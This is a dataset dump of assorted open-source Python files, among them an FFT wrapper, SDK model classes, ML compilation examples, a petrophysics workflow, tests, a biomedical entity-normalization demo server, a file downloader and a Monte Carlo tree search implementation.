max_stars_repo_path
stringlengths
4
245
max_stars_repo_name
stringlengths
7
115
max_stars_count
int64
101
368k
id
stringlengths
2
8
content
stringlengths
6
1.03M
recipes/Python/576550_gsl_real_fft_in_python3/recipe-576550.py
tdiprima/code
2,023
12747786
''' provide a simple python3 interface to the gsl_fft_real_transform function ''' import sys import itertools from gsl_setup import * def grouper(n, iterable, fillvalue=None): # http://docs.python.org/dev/3.0/library/itertools.html#module-itertools "grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx" args = [iter(iterable)] * n return itertools.zip_longest(fillvalue=fillvalue, *args) real_workspace_alloc = setup( gsl.gsl_fft_real_workspace_alloc,[c_ulong,],c_void_p) real_wavetable_alloc = setup( gsl.gsl_fft_real_wavetable_alloc,[c_ulong,],c_void_p) real_workspace_free =setup(gsl.gsl_fft_real_workspace_free ,[c_void_p,]) real_wavetable_free =setup(gsl.gsl_fft_real_wavetable_free ,[c_void_p,]) real_transform = setup(gsl.gsl_fft_real_transform, [c_void_p,c_ulong,c_ulong,c_void_p,c_void_p],) class Real_FFT: ''' returns the complex values of the real transform of the real data. return value[0] describes the offset, [1] is amplitude of term for wavelength = data length etceteras [-1] amp of wavelength = twice sample distance ''' def __init__(self): self.n = 0 def __call__(self,data): if len(data) < 2: if 1 == len(data): return data[:] return [] if len(data) != self.n: self.__del__() self.n = len(data) size = c_ulong(self.n) self.workspace = real_workspace_alloc(size) self.wavetable = real_wavetable_alloc(size) a = array('d',data) # need a copy of the data real_transform(ADDRESS(a),1,self.n,self.wavetable,self.workspace) rv = [complex(a[0]),] rv.extend(itertools.starmap(complex,grouper(2,a[1:],fillvalue=0))) return rv def __del__(self): if self.n: try: real_workspace_free(self.workspace) real_wavetable_free(self.wavetable) except AttributeError: print('Attribute error while freeing FFT auxiliary storage', file=sys.stderr) except: print('error freeing FFT auxiliary storage', file=sys.stderr) def produce_frequency(self,*,samples=None,sample_interval=None,sample_rate=None,total_length=None): ''' return the frequency grid based on actual sizes (default sample_interval=1). ''' n = samples or self.n if not n: return array('d') args_specified = 3 - ((not sample_interval)+(not sample_rate)+(not total_length)) if 1 < args_specified: raise TypeError('specify at most one of [sample_rate, total_length, sample_interval]') if 0 == args_specified: L = n elif sample_interval: L = n*sample_interval elif sample_rate: L = n/sample_rate else: L = total_length return as_array(waves/L for waves in range(1+n//2)) def produce_period(self,*args,**kwargs): ''' return the period grid based on actual sizes. frequency of zero --> period 0. what else to do? ''' f2T = self.produce_frequency(*args,**kwargs) for i in range(1,len(f2T)): f2T[i] = 1/f2T[i] return f2T real_fft = Real_FFT() def magnitude(a): return [abs(b) for b in a] def phase(a): return [phase(b) for b in a]
alipay/aop/api/domain/QueryComplexLabelRule.py
snowxmas/alipay-sdk-python-all
213
12747788
<filename>alipay/aop/api/domain/QueryComplexLabelRule.py #!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class QueryComplexLabelRule(object): def __init__(self): self._label_id = None self._label_name = None self._label_value = None self._operator = None @property def label_id(self): return self._label_id @label_id.setter def label_id(self, value): self._label_id = value @property def label_name(self): return self._label_name @label_name.setter def label_name(self, value): self._label_name = value @property def label_value(self): return self._label_value @label_value.setter def label_value(self, value): self._label_value = value @property def operator(self): return self._operator @operator.setter def operator(self, value): self._operator = value def to_alipay_dict(self): params = dict() if self.label_id: if hasattr(self.label_id, 'to_alipay_dict'): params['label_id'] = self.label_id.to_alipay_dict() else: params['label_id'] = self.label_id if self.label_name: if hasattr(self.label_name, 'to_alipay_dict'): params['label_name'] = self.label_name.to_alipay_dict() else: params['label_name'] = self.label_name if self.label_value: if hasattr(self.label_value, 'to_alipay_dict'): params['label_value'] = self.label_value.to_alipay_dict() else: params['label_value'] = self.label_value if self.operator: if hasattr(self.operator, 'to_alipay_dict'): params['operator'] = self.operator.to_alipay_dict() else: params['operator'] = self.operator return params @staticmethod def from_alipay_dict(d): if not d: return None o = QueryComplexLabelRule() if 'label_id' in d: o.label_id = d['label_id'] if 'label_name' in d: o.label_name = d['label_name'] if 'label_value' in d: o.label_value = d['label_value'] if 'operator' in d: o.operator = d['operator'] return o
lib/_included_packages/plexnet/threadutils.py
aleenator/plex-for-kodi
233
12747815
<reponame>aleenator/plex-for-kodi # import inspect # import ctypes from __future__ import absolute_import import threading # import time # def _async_raise(tid, exctype): # '''Raises an exception in the threads with id tid''' # if not inspect.isclass(exctype): # raise TypeError("Only types can be raised (not instances)") # try: # res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid), ctypes.py_object(exctype)) # except AttributeError: # # To catch: undefined symbol: PyThreadState_SetAsyncExc # return # if res == 0: # raise ValueError("invalid thread id") # elif res != 1: # # "if it returns a number greater than one, you're in trouble, # # and you should call it again with exc=NULL to revert the effect" # ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid), 0) # raise SystemError("PyThreadState_SetAsyncExc failed") # class KillThreadException(Exception): # pass class KillableThread(threading.Thread): pass '''A thread class that supports raising exception in the thread from another thread. ''' # def _get_my_tid(self): # """determines this (self's) thread id # CAREFUL : this function is executed in the context of the caller # thread, to get the identity of the thread represented by this # instance. # """ # if not self.isAlive(): # raise threading.ThreadError("the thread is not active") # return self.ident # def _raiseExc(self, exctype): # """Raises the given exception type in the context of this thread. # If the thread is busy in a system call (time.sleep(), # socket.accept(), ...), the exception is simply ignored. # If you are sure that your exception should terminate the thread, # one way to ensure that it works is: # t = ThreadWithExc( ... ) # ... # t.raiseExc( SomeException ) # while t.isAlive(): # time.sleep( 0.1 ) # t.raiseExc( SomeException ) # If the exception is to be caught by the thread, you need a way to # check that your thread has caught it. # CAREFUL : this function is executed in the context of the # caller thread, to raise an excpetion in the context of the # thread represented by this instance. # """ # _async_raise(self._get_my_tid(), exctype) def kill(self, force_and_wait=False): pass # try: # self._raiseExc(KillThreadException) # if force_and_wait: # time.sleep(0.1) # while self.isAlive(): # self._raiseExc(KillThreadException) # time.sleep(0.1) # except threading.ThreadError: # pass # def onKilled(self): # pass # def run(self): # try: # self._Thread__target(*self._Thread__args, **self._Thread__kwargs) # except KillThreadException: # self.onKilled()
examples/torchscript_resnet18_all_output_types.py
rdadolf/torch-mlir
213
12747828
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. # See https://llvm.org/LICENSE.txt for license information. # SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception # Also available under a BSD-style license. See LICENSE. import torch import torchvision import torch_mlir resnet18 = torchvision.models.resnet18(pretrained=True) resnet18.eval() module = torch_mlir.compile(resnet18, torch.ones(1, 3, 224, 224), output_type=torch_mlir.OutputType.TORCH) print("TORCH OutputType\n", module.operation.get_asm(large_elements_limit=10)) module = torch_mlir.compile(resnet18, torch.ones(1, 3, 224, 224), output_type=torch_mlir.OutputType.LINALG_ON_TENSORS) print("LINALG_ON_TENSORS OutputType\n", module.operation.get_asm(large_elements_limit=10)) # TODO: Debug why this is so slow. module = torch_mlir.compile(resnet18, torch.ones(1, 3, 224, 224), output_type=torch_mlir.OutputType.TOSA) print("TOSA OutputType\n", module.operation.get_asm(large_elements_limit=10))
examples/wolfcamp_single.py
SPWLA-ORG/PetroPy
145
12747868
<filename>examples/wolfcamp_single.py """ ================================== Wolfcamp Example - Single las file ================================== This example shows the full petrophysical workflow avaiable in PetroPy for a single wolfcamp las file courtesy of University Lands Texas. The workflow progresses in these 11 steps 1. Read las file and create a :class:`petropy.Log` object 2. Load tops from a csv file using :meth:`petropy.Log.tops_from_csv` 3. Create a :class:`petropy.LogViewer` show in edit_mode to fix data 4. Define formations for calculations. 5. Calculate fluid properties by 1. Loading parameters via :meth:`petropy.Log.fluid_properties_parameters_from_csv` 2. Calculating over formations via :meth:`petropy.Log.formation_fluid_properties` 6. Calculate mulitmineral properties by 1. Loading parameters via :meth:`petropy.Log.multimineral_parameters_from_csv` 2. Calculating over formations via :meth:`petropy.Log.formation_multimineral_model` 7. Curve summations via :meth:`petropy.Log.summations` 8. Adding pay flags via :meth:`petropy.Log.add_pay_flag` 9. Clustering intervals into Electrofacies via :meth:`petropy.electrofacies` 10. Exporting log statistics via :meth:`petropy.Log.statistics` 11. Saving LogViewer to png and Log to las To bulk process a folder of las files at once, use the `bulk example`_ . Downloading the script at the bottom of this webpage will not download the required las file or PetroPy logo. To download all files, view the `examples folder`_ on GitHub. .. _bulk example: wolfcamp_bulk.html .. _examples folder: https://github.com/toddheitmann/PetroPy/tree/master/examples """ import petropy as ptr # import pyplot to add logo to figure import matplotlib.pyplot as plt ### 1. Read las file # create a Log object by reading a file path # las_file_path = '42303347740000.las' log = ptr.Log(las_file_path) ### 2. load tops ### tops_file_path = 'tops.csv' log.tops_from_csv(tops_file_path) ### 3. graphically edit log ### # use manual mode for fixing borehole washout # # and other changes requiring redrawing data # # use bulk shift mode to linearly adjust all # # curve data # # close both windows to continue program # viewer = ptr.LogViewer(log, top = 6950, height = 100) viewer.show(edit_mode = True) # overwrite log variable with updated log # # from LogViewer edits # log = viewer.log ### 4. define formations ### f = ['WFMPA', 'WFMPB', 'WFMPC'] ### 5. fluid properties ### # load fluid properties from a csv file # # since path is not specified, load default # # csv file included with petropy # log.fluid_properties_parameters_from_csv() # calculate fluid properties over defined # # formations with parameter WFMP from # # previously loaded csv # log.formation_fluid_properties(f, parameter = 'WFMP') ### 6. multimineral model ### # load multimineral parameters from csv file # # since path is not specified, load default # # csv file included with petropy # log.multimineral_parameters_from_csv() # calculate multiminearl model over defined # # formations with parameter WFMP from # # previously loaded csv # log.formation_multimineral_model(f, parameter = 'WFMP') ### 7. summations ### # define curves to calculate cumulative values # c = ['OIP', 'BVH', 'PHIE'] # calculate cumulative values over formations # log.summations(f, curves = c) ### 8. pay flags ### # define pay flogs as list of tuples for # # (curve, value) # flag_1_gtoe = [('PHIE', 0.03)] flag_2_gtoe = [('PAY_FLAG_1', 1), ('BVH', 0.02)] flag_3_gtoe = [('PAY_FLAG_2', 1)] flag_3_ltoe = [('SW', 0.2)] # add pay flags over defined formations # log.add_pay_flag(f, greater_than_or_equal = flag_1_gtoe) log.add_pay_flag(f, greater_than_or_equal = flag_2_gtoe) log.add_pay_flag(f, greater_than_or_equal = flag_3_gtoe, less_than_or_equal = flag_3_ltoe) ### 9. electrofacies ### # define curves to use in electofaceis module # electro_logs = ['GR_N', 'RESDEEP_N', 'NPHI_N', 'RHOB_N', 'PE_N'] # make a list of Log objects as input # logs = [log] # calculate electrofacies for the defined logs# # over the specified formations # # finding 6 clusters of electrofacies # # with RESDEEP_N logarithmically scaled # logs = ptr.electrofacies(logs, f, electro_logs, 6, log_scale = ['RESDEEP_N']) # unpack log object from returned list # log = logs[0] ### 10. statistics ### # define list of curves to find statistics # stats_curves = ['OIP', 'BVH', 'PHIE', 'SW', 'VCLAY', 'TOC'] # calculate stats over specified formation and# # save to csv file wfmp_statistics.csv # # update the line if the well, formation is # # already included in the csv file # log.statistics_to_csv('wfmp_statistics.csv', replace = True, formations = f, curves = stats_curves, pay_flags = pay_flags, facies = facies_curves) ### 11. export data ### # find way to name well, looking for well name# # or UWI or API # if len(log.well['WELL'].value) > 0: well_name = log.well['WELL'].value elif len(str(log.well['UWI'].value)) > 0: well_name = str(log.well['UWI'].value) elif len(log.well['API'].value) > 0: well_name = str(log.well['API'].value) else: well_name = 'UNKNOWN' well_name = well_name.replace('.', '') # scale height of viewer to top and bottom # # of calculated values # wfmpa_top = log.tops['WFMPA'] wfmpc_base = log.next_formation_depth('WFMPC') top = wfmpa_top height = wfmpc_base - wfmpa_top # create LogViewer with the default full_oil # # template included in petropy # viewer = ptr.LogViewer(log, top = top, height = height, template_defaults = 'full_oil') # set viewer to 17x11 inches size for use in # # PowerPoint or printing to larger paper # viewer.fig.set_size_inches(17, 11) # add well_name to title of LogViewer # viewer.fig.suptitle(well_name, fontweight = 'bold', fontsize = 30) # add logo to top left corner # logo_im = plt.imread('company_logo.png') logo_ax = viewer.fig.add_axes([0, 0.85, 0.2, 0.2]) logo_ax.imshow(logo_im) logo_ax.axis('off') # add text to top right corner # if len(str(log.well['UWI'].value)) > 0: label = 'UWI: ' + str(log.well['UWI'].value) + '\n' elif len(log.well['API'].value) > 0: label = 'API: ' + str(log.well['API'].value) + '\n' else: label = '' label += 'County: Reagan\nCreated By: <NAME>\n' label += 'Creation Date: October 23, 2017' viewer.axes[0].annotate(label, xy = (0.99,0.99), xycoords = 'figure fraction', horizontalalignment = 'right', verticalalignment = 'top', fontsize = 14) # save figure and log # viewer_file_name=r'%s_processed.png' % well_name las_file_name = r'%s_processed.las' % well_name viewer.fig.savefig(viewer_file_name) viewer.log.write(las_file_name)
homeassistant/components/rpi_power/const.py
tbarbette/core
30,023
12747870
"""Constants for Raspberry Pi Power Supply Checker.""" DOMAIN = "rpi_power"
podman/tests/unit/test_manifests.py
kevinwylder/podman-py
106
12747879
<reponame>kevinwylder/podman-py<filename>podman/tests/unit/test_manifests.py import unittest from podman import PodmanClient, tests from podman.domain.manifests import ManifestsManager, Manifest class ManifestTestCase(unittest.TestCase): def setUp(self) -> None: super().setUp() self.client = PodmanClient(base_url=tests.BASE_SOCK) def tearDown(self) -> None: super().tearDown() self.client.close() def test_podmanclient(self): manager = self.client.manifests self.assertIsInstance(manager, ManifestsManager) def test_list(self): with self.assertRaises(NotImplementedError): self.client.manifests.list() def test_name(self): with self.assertRaises(ValueError): manifest = Manifest(attrs={"names": ""}) _ = manifest.name with self.assertRaises(ValueError): manifest = Manifest() _ = manifest.name if __name__ == '__main__': unittest.main()
examples.py
pauloromeira/onegram
150
12747894
<reponame>pauloromeira/onegram #!/usr/bin/env python from operator import itemgetter from itertools import islice from collections import defaultdict from onegram import Login, login, logout # Queries from onegram import user_info, post_info from onegram import followers, following from onegram import posts, likes, comments, feed from onegram import explore # Actions from onegram import follow, unfollow from onegram import like, unlike from onegram import comment, uncomment from onegram import save, unsave def likers_rank(user=None): rank = defaultdict(int) for post in posts(user): for like in likes(post): username = like['username'] rank[username] += 1 return sorted(rank.items(), key=itemgetter(1), reverse=True) def commenters_rank(user=None): rank = defaultdict(int) for post in posts(user): for commentary in comments(post): username = commentary['owner']['username'] rank[username] += 1 return sorted(rank.items(), key=itemgetter(1), reverse=True) p = next(posts('other')) like(p) unlike(p)
client/verta/tests/bases/test_deployable_entity.py
benshaw/modeldb
835
12747922
<gh_stars>100-1000 # -*- coding: utf-8 -*- import hashlib import string import tempfile import hypothesis import hypothesis.strategies as st import six from verta._protos.public.common import CommonService_pb2 from verta._internal_utils import _artifact_utils from verta.tracking.entities._deployable_entity import _DeployableEntity class TestBuildArtifactStorePath: @hypothesis.example( artifact_bytes=b"foo", key="my_artifact", ext="pkl", ) @hypothesis.given( artifact_bytes=st.binary(min_size=1), key=st.text(st.characters(blacklist_characters="."), min_size=1), ext=st.text(st.characters(blacklist_characters="."), min_size=1), ) def test_with_ext(self, artifact_bytes, key, ext): checksum = hashlib.sha256(artifact_bytes).hexdigest() filename = key + "." + ext expected_path = checksum + "/" + filename artifact_path = _DeployableEntity._build_artifact_store_path( artifact_stream=six.BytesIO(artifact_bytes), key=key, ext=ext, ) assert artifact_path == expected_path @hypothesis.example(artifact_bytes=b"foo", key="model") @hypothesis.example(artifact_bytes=b"foo", key="model_api.json") @hypothesis.given( artifact_bytes=st.binary(min_size=1), key=st.text(min_size=1), ) def test_no_ext(self, artifact_bytes, key): checksum = hashlib.sha256(artifact_bytes).hexdigest() filename = key expected_path = checksum + "/" + filename artifact_path = _DeployableEntity._build_artifact_store_path( artifact_stream=six.BytesIO(artifact_bytes), key=key, ) assert artifact_path == expected_path class TestCreateArtifactMsg: @hypothesis.given( artifact_bytes=st.binary(min_size=1), key=st.text( st.characters( blacklist_categories=("Cs",), # invalid UTF-8 blacklist_characters=".", ), min_size=1, ), ext=st.text( st.characters( whitelist_categories=("Lu", "Ll", "Nd"), # alphanumeric ), min_size=1, ), artifact_type=st.sampled_from( CommonService_pb2.ArtifactTypeEnum.ArtifactType.values(), ), method=st.text(min_size=1), framework=st.text(min_size=1), ) def test_with_ext( self, artifact_bytes, key, ext, artifact_type, method, framework, ): with tempfile.NamedTemporaryFile(suffix="." + ext) as tempf: tempf.write(artifact_bytes) tempf.seek(0) artifact_msg = _DeployableEntity._create_artifact_msg( key, tempf, artifact_type, method, framework, # no explicit extension ) checksum = hashlib.sha256(artifact_bytes).hexdigest() artifact_path = checksum + "/" + key + "." + ext assert artifact_msg == CommonService_pb2.Artifact( key=key, path=artifact_path, path_only=False, artifact_type=artifact_type, filename_extension=ext, serialization=method, artifact_subtype=framework, )
vedacore/parallel/_functions.py
jie311/vedadet
424
12747926
<reponame>jie311/vedadet # Copyright (c) Open-MMLab. All rights reserved. import torch from torch.nn.parallel._functions import _get_stream def scatter(input, devices, streams=None): """Scatters tensor across multiple GPUs. """ if streams is None: streams = [None] * len(devices) if isinstance(input, list): chunk_size = (len(input) - 1) // len(devices) + 1 outputs = [ scatter(input[i], [devices[i // chunk_size]], [streams[i // chunk_size]]) for i in range(len(input)) ] return outputs elif isinstance(input, torch.Tensor): output = input.contiguous() # TODO: copy to a pinned buffer first (if copying from CPU) stream = streams[0] if output.numel() > 0 else None with torch.cuda.device(devices[0]), torch.cuda.stream(stream): output = output.cuda(devices[0], non_blocking=True) return output else: raise Exception(f'Unknown type {type(input)}.') def synchronize_stream(output, devices, streams): if isinstance(output, list): chunk_size = len(output) // len(devices) for i in range(len(devices)): for j in range(chunk_size): synchronize_stream(output[i * chunk_size + j], [devices[i]], [streams[i]]) elif isinstance(output, torch.Tensor): if output.numel() != 0: with torch.cuda.device(devices[0]): main_stream = torch.cuda.current_stream() main_stream.wait_stream(streams[0]) output.record_stream(main_stream) else: raise Exception(f'Unknown type {type(output)}.') def get_input_device(input): if isinstance(input, list): for item in input: input_device = get_input_device(item) if input_device != -1: return input_device return -1 elif isinstance(input, torch.Tensor): return input.get_device() if input.is_cuda else -1 else: raise Exception(f'Unknown type {type(input)}.') class Scatter: @staticmethod def forward(target_gpus, input): input_device = get_input_device(input) streams = None if input_device == -1: # Perform CPU to GPU copies in a background stream streams = [_get_stream(device) for device in target_gpus] outputs = scatter(input, target_gpus, streams) # Synchronize with the copy stream if streams is not None: synchronize_stream(outputs, target_gpus, streams) return tuple(outputs)
tests/unit/cli/test_archives.py
tehlingchu/anchore-cli
110
12747934
from anchorecli.cli import archives
Whole-App-Acceleration/apps/resnet50/build_flow/DPUCADF8H_u200/scripts/utility/readme_gen/gs_summary_subdir.py
hito0512/Vitis-AI
848
12747975
<reponame>hito0512/Vitis-AI<filename>Whole-App-Acceleration/apps/resnet50/build_flow/DPUCADF8H_u200/scripts/utility/readme_gen/gs_summary_subdir.py #!/usr/bin/env python import os, re import fnmatch import json import sys sys.path.append(".") import gs_summary_util gs_summary_util.genReadMe2(".")
r2l/rerank.py
thilakshiK/wmt16-scripts
132
12747982
<reponame>thilakshiK/wmt16-scripts<gh_stars>100-1000 #!/usr/bin/python # -*- coding: utf-8 -*- # Author: <NAME> # Distributed under MIT license import sys from collections import defaultdict if __name__ == '__main__': if len(sys.argv) > 1: k = int(sys.argv[1]) else: k = float('inf') cur = 0 best_score = float('inf') best_sent = '' idx = 0 for line in sys.stdin: num, sent, scores = line.split(' ||| ') # new input sentence: print best translation of previous sentence, and reset stats if int(num) > cur: print best_sent #print best_score cur = int(num) best_score = float('inf') best_sent = '' idx = 0 #only consider k-best hypotheses if idx >= k: continue score = sum(map(float, scores.split())) if score < best_score: best_score = score best_sent = sent.strip() idx += 1 # end of file; print best translation of last sentence print best_sent # print best_score
demo.py
dmis-lab/BioSyn
114
12747993
<reponame>dmis-lab/BioSyn import argparse import os import pdb import pickle import tornado.web import tornado.ioloop import tornado.autoreload import logging import json from src.biosyn import ( DictionaryDataset, BioSyn, TextPreprocess ) logging.basicConfig( filename='.server.log', format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", level=logging.INFO ) parser = argparse.ArgumentParser(description='BioSyn Demo') # Required parser.add_argument('--model_name_or_path', required=True, help='Directory for model') # Settings parser.add_argument('--port', type=int, default=8888, help='port number') parser.add_argument('--show_predictions', action="store_true") parser.add_argument('--dictionary_path', type=str, default=None, help='dictionary path') parser.add_argument('--use_cuda', action="store_true") args = parser.parse_args() def cache_or_load_dictionary(): dictionary_name = os.path.splitext(os.path.basename(args.dictionary_path))[0] cached_dictionary_path = os.path.join( './tmp', "cached_{}.pk".format(dictionary_name) ) # If exist, load the cached dictionary if os.path.exists(cached_dictionary_path): with open(cached_dictionary_path, 'rb') as fin: cached_dictionary = pickle.load(fin) print("Loaded dictionary from cached file {}".format(cached_dictionary_path)) dictionary, dict_sparse_embeds, dict_dense_embeds = ( cached_dictionary['dictionary'], cached_dictionary['dict_sparse_embeds'], cached_dictionary['dict_dense_embeds'], ) else: dictionary = DictionaryDataset(dictionary_path = args.dictionary_path).data dictionary_names = dictionary[:,0] dict_sparse_embeds = biosyn.embed_sparse(names=dictionary_names, show_progress=True) dict_dense_embeds = biosyn.embed_dense(names=dictionary_names, show_progress=True) cached_dictionary = { 'dictionary': dictionary, 'dict_sparse_embeds' : dict_sparse_embeds, 'dict_dense_embeds' : dict_dense_embeds } if not os.path.exists('./tmp'): os.mkdir('./tmp') with open(cached_dictionary_path, 'wb') as fin: pickle.dump(cached_dictionary, fin) print("Saving dictionary into cached file {}".format(cached_dictionary_path)) return dictionary, dict_sparse_embeds, dict_dense_embeds def normalize(mention): # preprocess mention mention = TextPreprocess().run(mention) # embed mention mention_sparse_embeds = biosyn.embed_sparse(names=[mention]) mention_dense_embeds = biosyn.embed_dense(names=[mention]) # calcuate score matrix and get top 1 sparse_score_matrix = biosyn.get_score_matrix( query_embeds=mention_sparse_embeds, dict_embeds=dict_sparse_embeds ) dense_score_matrix = biosyn.get_score_matrix( query_embeds=mention_dense_embeds, dict_embeds=dict_dense_embeds ) sparse_weight = biosyn.get_sparse_weight().item() hybrid_score_matrix = sparse_weight * sparse_score_matrix + dense_score_matrix hybrid_candidate_idxs = biosyn.retrieve_candidate( score_matrix = hybrid_score_matrix, topk = 10 ) # get predictions from dictionary predictions = dictionary[hybrid_candidate_idxs].squeeze(0) output = { 'predictions' : [] } for prediction in predictions: predicted_name = prediction[0] predicted_id = prediction[1] output['predictions'].append({ 'name': predicted_name, 'id': predicted_id }) return output # load biosyn model biosyn = BioSyn( use_cuda=args.use_cuda, max_length=25 ) biosyn.load_model( model_name_or_path=args.model_name_or_path ) # cache or load dictionary dictionary, dict_sparse_embeds, dict_dense_embeds = cache_or_load_dictionary() class MainHandler(tornado.web.RequestHandler): def get(self): self.render("./template/index.html") class NormalizeHandler(tornado.web.RequestHandler): def get(self): string = self.get_argument('string', '') logging.info('get!{}'.format({ 'string':string, })) self.set_header("Content-Type", "application/json") output = normalize(mention=string) self.write(json.dumps(output)) def make_app(): settings={ 'debug':True } return tornado.web.Application([ (r"/", MainHandler), (r"/normalize/", NormalizeHandler), (r'/semantic/(.*)', tornado.web.StaticFileHandler, {'path': './semantic'}), (r'/images/(.*)', tornado.web.StaticFileHandler, {'path': './images'}), ],**settings) if __name__ == '__main__': logging.info('Starting biosyn server at http://localhost:{}'.format(args.port)) app = make_app() app.listen(args.port) tornado.ioloop.IOLoop.current().start()
lib/PyAMF-0.6.1/pyamf/tests/adapters/_google_models.py
MiCHiLU/google_appengine_sdk
790
12748003
<reponame>MiCHiLU/google_appengine_sdk from google.appengine.ext import db class PetModel(db.Model): """ """ # 'borrowed' from http://code.google.com/appengine/docs/datastore/entitiesandmodels.html name = db.StringProperty(required=True) type = db.StringProperty(required=True, choices=set(["cat", "dog", "bird"])) birthdate = db.DateProperty() weight_in_pounds = db.IntegerProperty() spayed_or_neutered = db.BooleanProperty() class PetExpando(db.Expando): """ """ name = db.StringProperty(required=True) type = db.StringProperty(required=True, choices=set(["cat", "dog", "bird"])) birthdate = db.DateProperty() weight_in_pounds = db.IntegerProperty() spayed_or_neutered = db.BooleanProperty() class ListModel(db.Model): """ """ numbers = db.ListProperty(long) class GettableModelStub(db.Model): """ """ gets = [] @staticmethod def get(*args, **kwargs): GettableModelStub.gets.append([args, kwargs]) class Author(db.Model): name = db.StringProperty() class Novel(db.Model): title = db.StringProperty() author = db.ReferenceProperty(Author) class EmptyModel(db.Model): """ A model that has no properties but also has no entities in the datastore. """
general/file-downloader/download.py
caesarcc/python-code-tutorials
1,059
12748020
<filename>general/file-downloader/download.py<gh_stars>1000+ from tqdm import tqdm import requests import cgi import sys # the url of file you want to download, passed from command line arguments url = sys.argv[1] # read 1024 bytes every time buffer_size = 1024 # download the body of response by chunk, not immediately response = requests.get(url, stream=True) # get the total file size file_size = int(response.headers.get("Content-Length", 0)) # get the default filename default_filename = url.split("/")[-1] # get the content disposition header content_disposition = response.headers.get("Content-Disposition") if content_disposition: # parse the header using cgi value, params = cgi.parse_header(content_disposition) # extract filename from content disposition filename = params.get("filename", default_filename) else: # if content dispotion is not available, just use default from URL filename = default_filename # progress bar, changing the unit to bytes instead of iteration (default by tqdm) progress = tqdm(response.iter_content(buffer_size), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024) with open(filename, "wb") as f: for data in progress.iterable: # write data read to the file f.write(data) # update the progress bar manually progress.update(len(data))
examples/design_search/mcts.py
ONLYA/RoboGrammar
156
12748028
<filename>examples/design_search/mcts.py from collections import defaultdict from math import log, sqrt import random class TreeNode(object): def __init__(self, state): self.state = state self.visit_count = 0 self.result_sum = 0 self.result_max = float('-inf') self.action_visit_counts = defaultdict(int) self.action_result_sums = defaultdict(float) self.action_result_maxes = defaultdict(lambda: float('-inf')) self.amaf_action_visit_counts = defaultdict(int) self.amaf_action_result_sums = defaultdict(float) self.amaf_action_result_maxes = defaultdict(lambda: float('-inf')) self.blocked = False class TreeSearch(object): def __init__(self, env, max_tries, default_policy=None): self.env = env self.max_tries = max_tries self.nodes = dict() # Mapping from state keys to nodes self.nodes[env.get_key(env.initial_state)] = TreeNode(env.initial_state) self.default_policy = default_policy def uct_score(self, node, action, amaf_threshold=10): action_visit_count = node.action_visit_counts[action] action_result_max = node.action_result_maxes[action] amaf_action_visit_count = node.amaf_action_visit_counts[action] amaf_action_result_max = node.amaf_action_result_maxes[action] # AMAF and Monte Carlo values are weighted equally when the visit count is # amaf_threshold amaf_weight = sqrt(amaf_threshold / (3 * node.visit_count + amaf_threshold)) if action_visit_count > 0: return ((1.0 - amaf_weight) * action_result_max + amaf_weight * amaf_action_result_max + sqrt(2.0 * log(node.visit_count) / action_visit_count)) else: return float('inf') def select_action(self, state): available_actions = list() # Filter out actions leading to blocked nodes for action in self.env.get_available_actions(state): next_state = self.env.get_next_state(state, action) next_state_key = self.env.get_key(next_state) if (next_state_key not in self.nodes or not self.nodes[next_state_key].blocked): available_actions.append(action) if available_actions: try: # Follow tree policy node = self.nodes[self.env.get_key(state)] return max(available_actions, key=lambda action: self.uct_score(node, action)) except KeyError: # State was not visited yet, follow default policy if self.default_policy is not None: return self.default_policy(state, available_actions) else: return random.choice(available_actions) else: return None def update_node(self, node, actions_after, result): node.visit_count += 1 node.result_sum += result node.result_max = max(node.result_max, result) node.action_visit_counts[actions_after[0]] += 1 node.action_result_sums[actions_after[0]] += result node.action_result_maxes[actions_after[0]] = \ max(node.action_result_maxes[actions_after[0]], result) # Update AMAF values (once for each unique action) for action in set(actions_after): node.amaf_action_visit_counts[action] += 1 node.amaf_action_result_sums[action] += result node.amaf_action_result_maxes[action] = \ max(node.amaf_action_result_maxes[action], result) def run_iteration(self): result = None while result is None: # Selection phase states = [self.env.initial_state] actions = [] action = self.select_action(states[-1]) while action is not None and self.env.get_key(states[-1]) in self.nodes: states.append(self.env.get_next_state(states[-1], action)) actions.append(action) action = self.select_action(states[-1]) # Expansion phase last_state_key = self.env.get_key(states[-1]) if last_state_key in self.nodes: last_node = self.nodes[last_state_key] else: last_node = TreeNode(states[-1]) self.nodes[last_state_key] = last_node # Simulation phase for try_count in range(self.max_tries): sim_states = states.copy() sim_actions = actions.copy() action = self.select_action(sim_states[-1]) while action is not None: sim_states.append(self.env.get_next_state(sim_states[-1], action)) sim_actions.append(action) action = self.select_action(sim_states[-1]) result = self.env.get_result(sim_states[-1]) if result is not None: # Result is valid break if result is None: # No valid simulation after max_tries tries, block the last node # Next loop iteration will select a different node last_node.blocked = True print("Blocked node:", [self.env.rules.index(rule) for rule in last_node.state[1]]) # Backpropagation phase for i, state in enumerate(sim_states[:-1]): actions_after = sim_actions[i:] try: node = self.nodes[self.env.get_key(state)] self.update_node(node, actions_after, result) except KeyError: pass return sim_states, sim_actions, result
helpers/json_manager.py
xxopcode90xx/DiscordChatBotProject
491
12748030
<gh_stars>100-1000 import json def add_user_to_blacklist(user_id: int): with open("blacklist.json", "r+") as file: file_data = json.load(file) file_data["ids"].append(user_id) with open("blacklist.json", "w") as file: file.seek(0) json.dump(file_data, file, indent=4) def remove_user_from_blacklist(user_id: int): with open("blacklist.json", "r") as file: file_data = json.load(file) file_data["ids"].remove(user_id) with open("blacklist.json", "w") as file: file.seek(0) json.dump(file_data, file, indent=4)
demos/sort.py
bahmanahmadi/mpyc
232
12748049
